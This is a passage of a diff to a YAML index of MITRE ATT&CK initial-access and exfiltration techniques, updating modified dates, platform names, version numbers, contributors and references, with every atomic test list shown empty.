       name: 'Valid Accounts: Default Accounts'
       description: |-
         Adversaries may obtain and abuse credentials of a default account as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Default accounts are those that are built-into an OS, such as the Guest or Administrator accounts on Windows systems. Default accounts also include default factory/provider set accounts on other types of systems, software, or devices, including the root user account in AWS and the default service account in Kubernetes.(Citation: Microsoft Local Accounts Feb 2019)(Citation: AWS Root User)(Citation: Threat Matrix for Kubernetes)
@@ -59534,6 +60456,7 @@ initial-access:
         phase_name: privilege-escalation
       - kill_chain_name: mitre-attack
         phase_name: initial-access
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_deprecated: false
       x_mitre_detection: Monitor whether default accounts have been activated or logged
         into. These audits should also include checks on any appliances and applications
@@ -59542,18 +60465,18 @@ initial-access:
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: true
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
       - Windows
-      - Azure AD
-      - Office 365
       - SaaS
       - IaaS
       - Linux
       - macOS
-      - Google Workspace
       - Containers
       - Network
-      x_mitre_version: '1.3'
+      - Office Suite
+      - Identity Provider
+      x_mitre_version: '1.4'
       x_mitre_data_sources:
       - 'Logon Session: Logon Session Creation'
       - 'User Account: User Account Authentication'
@@ -59585,14 +60508,11 @@ initial-access:
         url: https://www.microsoft.com/security/blog/2020/04/02/attack-matrix-kubernetes/
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.2.0
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1078.001
     atomic_tests: []
   T1199:
     technique:
-      modified: '2022-11-08T14:00:00.188Z'
+      modified: '2024-10-15T16:08:39.968Z'
       name: Trusted Relationship
       description: |-
         Adversaries may breach or otherwise leverage organizations who have access to intended victims. Access through trusted third party relationship abuses an existing connection that may not be protected or receives less scrutiny than standard mechanisms of gaining access to a network.
@@ -59603,6 +60523,11 @@ initial-access:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: initial-access
+      x_mitre_contributors:
+      - Praetorian
+      - ExtraHop
+      - Jannie Li, Microsoft Threat Intelligence Center (MSTIC)
+      x_mitre_deprecated: false
       x_mitre_detection: Establish monitoring for activity conducted by second and
         third party providers and other trusted entities that may be leveraged as
         a means to gain access to the network. Depending on the type of relationship,
@@ -59611,22 +60536,18 @@ initial-access:
         is based on IT services. Adversaries may be able to act quickly towards an
         objective, so proper monitoring for behavior related to Credential Access,
         Lateral Movement, and Collection will be important to detect the intrusion.
+      x_mitre_domains:
+      - enterprise-attack
+      x_mitre_is_subtechnique: false
       x_mitre_platforms:
       - Windows
       - SaaS
       - IaaS
       - Linux
       - macOS
-      - Office 365
-      x_mitre_is_subtechnique: false
-      x_mitre_deprecated: false
-      x_mitre_domains:
-      - enterprise-attack
-      x_mitre_version: '2.3'
-      x_mitre_contributors:
-      - Praetorian
-      - ExtraHop
-      - Jannie Li, Microsoft Threat Intelligence Center (MSTIC)
+      - Identity Provider
+      - Office Suite
+      x_mitre_version: '2.4'
       x_mitre_data_sources:
       - 'Logon Session: Logon Session Creation'
       - 'Logon Session: Logon Session Metadata'
@@ -59651,36 +60572,19 @@ initial-access:
         url: https://support.microsoft.com/en-us/topic/partners-offer-delegated-administration-26530dc0-ebba-415b-86b1-b55bc06b073e?ui=en-us&rs=en-us&ad=us
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 2.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1566:
     technique:
-      modified: '2024-03-01T16:56:32.245Z'
+      modified: '2024-10-07T15:00:19.668Z'
       name: Phishing
-      description: "Adversaries may send phishing messages to gain access to victim
-        systems. All forms of phishing are electronically delivered social engineering.
-        Phishing can be targeted, known as spearphishing. In spearphishing, a specific
-        individual, company, or industry will be targeted by the adversary. More generally,
-        adversaries can conduct non-targeted phishing, such as in mass malware spam
-        campaigns.\n\nAdversaries may send victims emails containing malicious attachments
-        or links, typically to execute malicious code on victim systems. Phishing
-        may also be conducted via third-party services, like social media platforms.
-        Phishing may also involve social engineering techniques, such as posing as
-        a trusted source, as well as evasive techniques such as removing or manipulating
-        emails or metadata/headers from compromised accounts being abused to send
-        messages (e.g., [Email Hiding Rules](https://attack.mitre.org/techniques/T1564/008)).(Citation:
-        Microsoft OAuth Spam 2022)(Citation: Palo Alto Unit 42 VBA Infostealer 2014)
-        Another way to accomplish this is by forging or spoofing(Citation: Proofpoint-spoof)
-        the identity of the sender which can be used to fool both the human recipient
-        as well as automated security tools.(Citation: cyberproof-double-bounce) \n\nVictims
-        may also receive phishing messages that instruct them to call a phone number
-        where they are directed to visit a malicious URL, download malware,(Citation:
-        sygnia Luna Month)(Citation: CISA Remote Monitoring and Management Software)
-        or install adversary-accessible remote management tools onto their computer
-        (i.e., [User Execution](https://attack.mitre.org/techniques/T1204)).(Citation:
-        Unit42 Luna Moth)"
+      description: |-
+        Adversaries may send phishing messages to gain access to victim systems. All forms of phishing are electronically delivered social engineering. Phishing can be targeted, known as spearphishing. In spearphishing, a specific individual, company, or industry will be targeted by the adversary. More generally, adversaries can conduct non-targeted phishing, such as in mass malware spam campaigns.
+
+        Adversaries may send victims emails containing malicious attachments or links, typically to execute malicious code on victim systems. Phishing may also be conducted via third-party services, like social media platforms. Phishing may also involve social engineering techniques, such as posing as a trusted source, as well as evasive techniques such as removing or manipulating emails or metadata/headers from compromised accounts being abused to send messages (e.g., [Email Hiding Rules](https://attack.mitre.org/techniques/T1564/008)).(Citation: Microsoft OAuth Spam 2022)(Citation: Palo Alto Unit 42 VBA Infostealer 2014) Another way to accomplish this is by forging or spoofing(Citation: Proofpoint-spoof) the identity of the sender which can be used to fool both the human recipient as well as automated security tools,(Citation: cyberproof-double-bounce) or by including the intended target as a party to an existing email thread that includes malicious files or links (i.e., "thread hijacking").(Citation: phishing-krebs)
+
+        Victims may also receive phishing messages that instruct them to call a phone number where they are directed to visit a malicious URL, download malware,(Citation: sygnia Luna Month)(Citation: CISA Remote Monitoring and Management Software) or install adversary-accessible remote management tools onto their computer (i.e., [User Execution](https://attack.mitre.org/techniques/T1204)).(Citation: Unit42 Luna Moth)
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: initial-access
@@ -59709,9 +60613,9 @@ initial-access:
       - macOS
       - Windows
       - SaaS
-      - Office 365
-      - Google Workspace
-      x_mitre_version: '2.5'
+      - Identity Provider
+      - Office Suite
+      x_mitre_version: '2.6'
       x_mitre_data_sources:
       - 'File: File Creation'
       - 'Network Traffic: Network Traffic Flow'
@@ -59729,7 +60633,11 @@ initial-access:
       - source_name: ACSC Email Spoofing
         description: Australian Cyber Security Centre. (2012, December). Mitigating
           Spoofed Emails Using Sender Policy Framework. Retrieved October 19, 2020.
-        url: https://www.cyber.gov.au/sites/default/files/2019-03/spoof_email_sender_policy_framework.pdf
+        url: https://web.archive.org/web/20210708014107/https://www.cyber.gov.au/sites/default/files/2019-03/spoof_email_sender_policy_framework.pdf
+      - source_name: phishing-krebs
+        description: 'Brian Krebs. (2024, March 28). Thread Hijacking: Phishes That
+          Prey on Your Curiosity. Retrieved September 27, 2024.'
+        url: https://krebsonsecurity.com/2024/03/thread-hijacking-phishes-that-prey-on-your-curiosity/
       - source_name: CISA Remote Monitoring and Management Software
         description: CISA. (n.d.). Protecting Against Malicious Use of Remote Monitoring
           and Management Software. Retrieved February 2, 2023.
@@ -59767,11 +60675,10 @@ initial-access:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1078:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2024-10-15T16:09:46.024Z'
       name: Valid Accounts
       description: |-
         Adversaries may obtain and abuse credentials of existing accounts as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Compromised credentials may be used to bypass access controls placed on various resources on systems within the network and may even be used for persistent access to remote systems and externally available services, such as VPNs, Outlook Web Access, network devices, and remote desktop.(Citation: volexity_0day_sophos_FW) Compromised credentials may also grant an adversary increased privilege to specific systems or access to restricted areas of the network. Adversaries may choose not to use malware or tools in conjunction with the legitimate access those credentials provide to make it harder to detect their presence.
@@ -59788,7 +60695,6 @@ initial-access:
         phase_name: privilege-escalation
       - kill_chain_name: mitre-attack
         phase_name: initial-access
-      x_mitre_attack_spec_version: 3.1.0
       x_mitre_contributors:
       - Syed Ummar Farooqh, McAfee
       - Prasad Somasamudram, McAfee
@@ -59798,7 +60704,7 @@ initial-access:
       - Netskope
       - Mark Wee
       - Praetorian
-      - Goldstein Menachem
+      - Menachem Goldstein
       x_mitre_deprecated: false
       x_mitre_detection: |-
         Configure robust, consistent account activity audit policies across the enterprise and with externally accessible services.(Citation: TechNet Audit Policy) Look for suspicious account behavior across systems that share accounts, either user, admin, or service accounts. Examples: one account logged into multiple systems simultaneously; multiple accounts logged into the same machine simultaneously; accounts logged in at odd times or outside of business hours. Activity may be from interactive login sessions or process ownership from accounts being used to execute binaries on a remote system as a particular account. Correlate other security systems with login information (e.g., a user has an active login session but has not entered the building or does not have VPN access).
@@ -59807,19 +60713,17 @@ initial-access:
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: false
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
       - Windows
-      - Azure AD
-      - Office 365
       - SaaS
       - IaaS
       - Linux
       - macOS
-      - Google Workspace
       - Containers
       - Network
-      x_mitre_version: '2.6'
+      - Office Suite
+      - Identity Provider
+      x_mitre_version: '2.7'
       x_mitre_data_sources:
       - 'Logon Session: Logon Session Creation'
       - 'User Account: User Account Authentication'
@@ -59867,11 +60771,12 @@ initial-access:
         url: https://technet.microsoft.com/en-us/library/dn487457.aspx
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      spec_version: '2.1'
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
     atomic_tests: []
   T1566.004:
     technique:
-      modified: '2023-10-15T11:49:40.990Z'
+      modified: '2024-10-15T16:06:47.134Z'
       name: Spearphishing Voice
       description: |-
         Adversaries may use voice communications to ultimately gain access to victim systems. Spearphishing voice is a specific variant of spearphishing. It is different from other forms of spearphishing in that is employs the use of manipulating a user into providing access to systems through a phone call or other forms of voice communications. Spearphishing frequently involves social engineering techniques, such as posing as a trusted source (ex: [Impersonation](https://attack.mitre.org/techniques/T1656)) and/or creating a sense of urgency or alarm for the recipient.
@@ -59891,10 +60796,8 @@ initial-access:
       - Linux
       - macOS
       - Windows
-      - Office 365
-      - SaaS
-      - Google Workspace
-      x_mitre_version: '1.0'
+      - Identity Provider
+      x_mitre_version: '1.1'
       x_mitre_data_sources:
       - 'Application Log: Application Log Content'
       type: attack-pattern
@@ -59927,7 +60830,6 @@ initial-access:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1195.002:
     technique:
@@ -59966,7 +60868,7 @@ initial-access:
         may be specific to a desired victim set or may be distributed to a broad set
         of consumers but only move on to additional tactics on specific victims.(Citation:
         Avast CCleaner3 2018)(Citation: Command Five SK 2011)  "
-      modified: '2022-05-24T14:00:00.188Z'
+      modified: '2022-04-28T16:04:36.636Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       name: Compromise Software Supply Chain
       x_mitre_detection: 'Use verification of distributed binaries through hash checking
@@ -59981,7 +60883,6 @@ initial-access:
       - 'File: File Metadata'
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1078.002:
     technique:
@@ -60061,11 +60962,10 @@ initial-access:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1200:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2023-03-30T21:01:40.332Z'
       name: Hardware Additions
       description: |-
         Adversaries may introduce computer accessories, networking hardware, or other computing devices into a system or network that can be used as a vector to gain access. Rather than just connecting and distributing payloads via removable storage (i.e. [Replication Through Removable Media](https://attack.mitre.org/techniques/T1091)), more robust hardware additions can be used to introduce new functionalities and/or features into a system that can then be abused.
@@ -60121,11 +61021,10 @@ initial-access:
         url: https://www.youtube.com/watch?v=fXthwl6ShOg
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      spec_version: '2.1'
     atomic_tests: []
   T1189:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2024-10-15T15:55:47.494Z'
       name: Drive-by Compromise
       description: "Adversaries may gain access to a system through a user visiting
         a website over the normal course of browsing. With this technique, the user's
@@ -60186,8 +61085,8 @@ initial-access:
       - Windows
       - Linux
       - macOS
-      - SaaS
-      x_mitre_version: '1.5'
+      - Identity Provider
+      x_mitre_version: '1.6'
       x_mitre_data_sources:
       - 'Application Log: Application Log Content'
       - 'Network Traffic: Network Traffic Content'
@@ -60215,13 +61114,12 @@ initial-access:
         url: https://www.volexity.com/blog/2017/11/06/oceanlotus-blossoms-mass-digital-surveillance-and-exploitation-of-asean-nations-the-media-human-rights-and-civil-society/
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1078.004:
     technique:
-      modified: '2024-03-29T15:42:13.499Z'
+      modified: '2024-10-14T22:11:30.271Z'
       name: 'Valid Accounts: Cloud Accounts'
       description: "Valid accounts in cloud environments may allow adversaries to
         perform actions to achieve Initial Access, Persistence, Privilege Escalation,
@@ -60261,8 +61159,10 @@ initial-access:
         phase_name: privilege-escalation
       - kill_chain_name: mitre-attack
         phase_name: initial-access
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_contributors:
       - Jon Sternstein, Stern Security
+      - Arun Seelagan, CISA
       x_mitre_deprecated: false
       x_mitre_detection: Monitor the activity of cloud accounts to detect abnormal
         or malicious behavior, such as accessing information outside of the normal
@@ -60270,13 +61170,13 @@ initial-access:
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: true
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
-      - Azure AD
-      - Office 365
       - SaaS
       - IaaS
-      - Google Workspace
-      x_mitre_version: '1.7'
+      - Office Suite
+      - Identity Provider
+      x_mitre_version: '1.8'
       x_mitre_data_sources:
       - 'User Account: User Account Authentication'
       - 'Logon Session: Logon Session Metadata'
@@ -60307,14 +61207,11 @@ initial-access:
         url: https://docs.microsoft.com/en-us/windows-server/identity/ad-fs/deployment/how-to-connect-fed-azure-adfs
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.2.0
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1078.004
     atomic_tests: []
   T1566.003:
     technique:
-      modified: '2024-01-31T14:15:55.690Z'
+      modified: '2024-10-15T15:16:30.272Z'
       name: Spearphishing via Service
       description: "Adversaries may send spearphishing messages via third-party services
         in an attempt to gain access to victim systems. Spearphishing via service
@@ -60381,11 +61278,10 @@ initial-access:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1078.003:
     technique:
-      modified: '2023-07-14T13:04:04.591Z'
+      modified: '2024-10-15T16:36:36.681Z'
       name: 'Valid Accounts: Local Accounts'
       description: "Adversaries may obtain and abuse credentials of a local account
         as a means of gaining Initial Access, Persistence, Privilege Escalation, or
@@ -60437,15 +61333,14 @@ initial-access:
         external_id: T1078.003
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1078.003
     atomic_tests: []
 exfiltration:
   T1567:
     technique:
-      modified: '2023-09-05T15:00:36.471Z'
+      modified: '2024-10-15T15:57:40.951Z'
       name: Exfiltration Over Web Service
       description: |-
         Adversaries may use an existing, legitimate external Web service to exfiltrate data rather than their primary command and control channel. Popular Web services acting as an exfiltration mechanism may give a significant amount of cover due to the likelihood that hosts within a network are already communicating with them prior to compromise. Firewall rules may also already exist to permit traffic to these services.
@@ -60469,10 +61364,9 @@ exfiltration:
       - Linux
       - macOS
       - Windows
-      - Office 365
       - SaaS
-      - Google Workspace
-      x_mitre_version: '1.3'
+      - Office Suite
+      x_mitre_version: '1.4'
       x_mitre_data_sources:
       - 'Network Traffic: Network Traffic Content'
       - 'Network Traffic: Network Connection Creation'
@@ -60491,13 +61385,12 @@ exfiltration:
         external_id: T1567
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1567.004:
     technique:
-      modified: '2023-10-12T05:22:59.079Z'
+      modified: '2024-10-15T15:57:55.928Z'
       name: Exfiltration Over Webhook
       description: "Adversaries may exfiltrate data to a webhook endpoint rather than
         over their primary command and control channel. Webhooks are simple mechanisms
@@ -60536,9 +61429,8 @@ exfiltration:
       - macOS
       - Linux
       - SaaS
-      - Office 365
-      - Google Workspace
-      x_mitre_version: '1.0'
+      - Office Suite
+      x_mitre_version: '1.1'
       x_mitre_data_sources:
       - 'Application Log: Application Log Content'
       - 'Command: Command Execution'
@@ -60588,7 +61480,6 @@ exfiltration:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1029:
     technique:
@@ -60608,7 +61499,7 @@ exfiltration:
       - source_name: mitre-attack
         url: https://attack.mitre.org/techniques/T1029
         external_id: T1029
-      modified: '2021-04-29T14:49:39.188Z'
+      modified: '2020-03-28T00:26:48.769Z'
       name: Scheduled Transfer
       description: |-
         Adversaries may schedule data exfiltration to be performed only at certain times of day or at certain intervals. This could be done to blend traffic patterns with normal activity or availability.
@@ -60628,8 +61519,6 @@ exfiltration:
       - 'Network Traffic: Network Traffic Flow'
       - 'Network Traffic: Network Connection Creation'
       x_mitre_is_subtechnique: false
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1011:
     technique:
@@ -60676,7 +61565,6 @@ exfiltration:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1011.001:
     technique:
@@ -60696,7 +61584,7 @@ exfiltration:
       - source_name: mitre-attack
         external_id: T1011.001
         url: https://attack.mitre.org/techniques/T1011/001
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2022-03-08T21:02:15.802Z'
       name: Exfiltration Over Bluetooth
       description: |-
         Adversaries may attempt to exfiltrate data over Bluetooth rather than the command and control channel. If the command and control network is a wired Internet connection, an adversary may opt to exfiltrate data using a Bluetooth communication channel.
@@ -60718,8 +61606,6 @@ exfiltration:
       - 'File: File Access'
       - 'Network Traffic: Network Traffic Content'
       - 'Network Traffic: Network Connection Creation'
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1020:
     technique:
@@ -60773,7 +61659,6 @@ exfiltration:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1020
     atomic_tests: []
   T1048.001:
@@ -60798,7 +61683,7 @@ exfiltration:
         description: Gardiner, J.,  Cova, M., Nagaraja, S. (2014, February). Command
           & Control Understanding, Denying and Detecting. Retrieved April 20, 2016.
         source_name: University of Birmingham C2
-      modified: '2021-04-29T14:49:39.188Z'
+      modified: '2020-03-28T00:43:24.228Z'
       name: Exfiltration Over Symmetric Encrypted Non-C2 Protocol
       description: "Adversaries may steal data by exfiltrating it over a symmetrically
         encrypted network protocol other than that of the existing command and control
@@ -60833,12 +61718,10 @@ exfiltration:
       - 'Command: Command Execution'
       - 'File: File Access'
       - 'Network Traffic: Network Connection Creation'
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1020.001:
     technique:
-      modified: '2023-04-14T23:23:30.327Z'
+      modified: '2024-10-15T16:08:13.273Z'
       name: Traffic Duplication
       description: |-
         Adversaries may leverage traffic mirroring in order to automate data exfiltration over compromised infrastructure. Traffic mirroring is a native feature for some devices, often used for network analysis. For example, devices may be configured to forward network traffic to one or more destinations for analysis by a network analyzer or other monitoring device. (Citation: Cisco Traffic Mirroring)(Citation: Juniper Traffic Mirroring)
@@ -60863,11 +61746,10 @@ exfiltration:
       x_mitre_platforms:
       - Network
       - IaaS
-      x_mitre_version: '1.2'
+      x_mitre_version: '1.3'
       x_mitre_data_sources:
       - 'Network Traffic: Network Connection Creation'
       - 'Network Traffic: Network Traffic Flow'
-      x_mitre_network_requirements: false
       type: attack-pattern
       id: attack-pattern--7c46b364-8496-4234-8a56-f7e6727e21e1
       created: '2020-10-19T13:40:11.118Z'
@@ -60910,9 +61792,8 @@ exfiltration:
         url: https://www.us-cert.gov/ncas/alerts/TA18-106A
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1567.001:
     technique:
@@ -60959,7 +61840,6 @@ exfiltration:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1048.002:
     technique:
@@ -60985,7 +61865,7 @@ exfiltration:
         description: Gardiner, J.,  Cova, M., Nagaraja, S. (2014, February). Command
           & Control Understanding, Denying and Detecting. Retrieved April 20, 2016.
         source_name: University of Birmingham C2
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-10-15T22:44:11.953Z'
       name: Exfiltration Over Alternative Protocol - Exfiltration Over Asymmetric
         Encrypted Non-C2 Protocol
       description: "Adversaries may steal data by exfiltrating it over an asymmetrically
@@ -61018,13 +61898,11 @@ exfiltration:
       - 'File: File Access'
       - 'Network Traffic: Network Connection Creation'
       - 'Network Traffic: Network Traffic Content'
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
       identifier: T1048.002
     atomic_tests: []
   T1041:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2023-04-07T17:09:14.040Z'
       name: Exfiltration Over C2 Channel
       description: Adversaries may steal data by exfiltrating it over an existing
         command and control channel. Stolen data is encoded into the normal communications
@@ -61073,12 +61951,11 @@ exfiltration:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1041
     atomic_tests: []
   T1048:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2024-10-15T15:57:26.415Z'
       name: Exfiltration Over Alternative Protocol
       description: "Adversaries may steal data by exfiltrating it over a different
         protocol than that of the existing command and control channel. The data may
@@ -61114,12 +61991,11 @@ exfiltration:
       - Linux
       - macOS
       - Windows
-      - Office 365
       - SaaS
       - IaaS
-      - Google Workspace
       - Network
-      x_mitre_version: '1.4'
+      - Office Suite
+      x_mitre_version: '1.5'
       x_mitre_data_sources:
       - 'Cloud Storage: Cloud Storage Access'
       - 'Network Traffic: Network Traffic Flow'
@@ -61128,7 +62004,6 @@ exfiltration:
       - 'Application Log: Application Log Content'
       - 'File: File Access'
       - 'Network Traffic: Network Connection Creation'
-      x_mitre_network_requirements: false
       type: attack-pattern
       id: attack-pattern--a19e86f8-1c0a-4fea-8407-23b73d615776
       created: '2017-05-31T21:30:44.720Z'
@@ -61152,9 +62027,8 @@ exfiltration:
         url: https://labs.sentinelone.com/20-common-tools-techniques-used-by-macos-threat-actors-malware/
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1048
     atomic_tests: []
   T1052.001:
@@ -61177,7 +62051,7 @@ exfiltration:
       - source_name: mitre-attack
         external_id: T1052.001
         url: https://attack.mitre.org/techniques/T1052/001
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-10-15T22:48:29.490Z'
       name: Exfiltration over USB
       description: Adversaries may attempt to exfiltrate data over a USB connected
         physical device. In certain circumstances, such as an air-gapped network compromise,
@@ -61199,8 +62073,6 @@ exfiltration:
       - 'Command: Command Execution'
       x_mitre_system_requirements:
       - Presence of physical medium or device
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1567.003:
     technique:
@@ -61251,7 +62123,6 @@ exfiltration:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1567.003
     atomic_tests: []
   T1567.002:
@@ -61301,7 +62172,6 @@ exfiltration:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1567.002
     atomic_tests: []
   T1030:
@@ -61326,7 +62196,7 @@ exfiltration:
         description: Gardiner, J.,  Cova, M., Nagaraja, S. (2014, February). Command
           & Control Understanding, Denying and Detecting. Retrieved April 20, 2016.
         source_name: University of Birmingham C2
-      modified: '2021-04-29T14:49:39.188Z'
+      modified: '2020-07-14T19:47:46.912Z'
       name: Data Transfer Size Limits
       description: An adversary may exfiltrate data in fixed size chunks instead of
         whole files or limit packet sizes below certain thresholds. This approach
@@ -61349,13 +62219,11 @@ exfiltration:
       - 'Network Traffic: Network Connection Creation'
       - 'Network Traffic: Network Traffic Flow'
       x_mitre_is_subtechnique: false
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
       identifier: T1030
     atomic_tests: []
   T1537:
     technique:
-      modified: '2024-04-11T15:53:00.577Z'
+      modified: '2024-10-15T16:08:25.344Z'
       name: Transfer Data to Cloud Account
       description: "Adversaries may exfiltrate data by transferring the data, including
         through sharing/syncing and creating backups of cloud environments, to another
@@ -61396,9 +62264,8 @@ exfiltration:
       x_mitre_platforms:
       - IaaS
       - SaaS
-      - Google Workspace
-      - Office 365
-      x_mitre_version: '1.4'
+      - Office Suite
+      x_mitre_version: '1.5'
       x_mitre_data_sources:
       - 'Cloud Storage: Cloud Storage Modification'
       - 'Snapshot: Snapshot Creation'
@@ -61446,7 +62313,6 @@ exfiltration:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1052:
     technique:
@@ -61468,7 +62334,7 @@ exfiltration:
       - source_name: mitre-attack
         url: https://attack.mitre.org/techniques/T1052
         external_id: T1052
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-10-15T22:48:29.702Z'
       name: Exfiltration Over Physical Medium
       description: Adversaries may attempt to exfiltrate data via a physical medium,
